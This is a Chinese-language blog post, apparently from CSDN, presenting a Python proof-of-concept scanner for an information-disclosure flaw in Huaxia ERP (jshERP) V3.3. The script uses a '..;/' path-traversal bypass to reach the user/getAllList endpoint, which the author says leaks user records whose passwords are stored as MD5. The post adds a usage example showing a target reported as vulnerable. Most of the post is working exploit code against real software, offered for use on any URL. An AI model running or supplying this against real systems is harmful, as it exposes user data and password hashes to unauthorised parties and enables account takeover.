一、背景
此次编写的是圈子中分享的华夏ERP信息泄露(userList)漏洞;测试该漏洞目前还是存在的;经过挖掘发现该ERP使用的用户密码加密方式是属于MD5加密;这是一种容易被攻击这撞库的加密方式可以说和明文传输没有区别。
二、POC编写
import argparse
import requests
import sys
# 创建poc模块接收参数
def cmd(url):
# 创建payliad
payload = "/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList"
url1 = f"{url}{payload}"
try:
response = requests.get(url1, verify=False, timeout=3) # 发送get请求,超时3秒
if response.status_code == 200 and "userList" in response.text:
print( f"【+】{url}存在该漏洞\n")
else:
print( f"【-】{url}不存在该漏洞\n")
except Exception as e:
print( f"【*】{url}存在异常;请检测!!\n")
def main():
# 字符画
banner = """
_____ _ _____ _
| __ \ | | | __ \ | |
| | | | __ _| |_ __ _ | |__) |__ _ ___| | __
| | | |/ _` | __/ _` | | _ // _` |/ __| |/ /
| |__| | (_| | || (_| | | | \ \ (_| | (__| <
|_____/ \__,_|\__\__,_| |_| \_\__,_|\___|_|\_\
作者:添衣&吹風 地址:https://blog.csdn.net/weixin_53884648
"""
print(banner)
print("华夏ERP-V3.3")
parser = argparse.ArgumentParser()
parser.add_argument("-u", dest="url", required=True, default=None, help="请输入url地址")
args = parser.parse_args()
cmd(args.url)
if __name__ == '__main__':
main()
三、使用
python 华夏ERP.py -u http://x.x.x.x
_____ _ _____ _
| __ \ | | | __ \ | |
| | | | __ _| |_ __ _ | |__) |__ _ ___| | __
| | | |/ _` | __/ _` | | _ // _` |/ __| |/ /
| |__| | (_| | || (_| | | | \ \ (_| | (__| <
|_____/ \__,_|\__\__,_| |_| \_\__,_|\___|_|\_
作者:添衣&吹風 地址:https://blog.csdn.net/weixin_53884648
华夏ERP-V3.3
【+】http://x.x.x.x存在该漏洞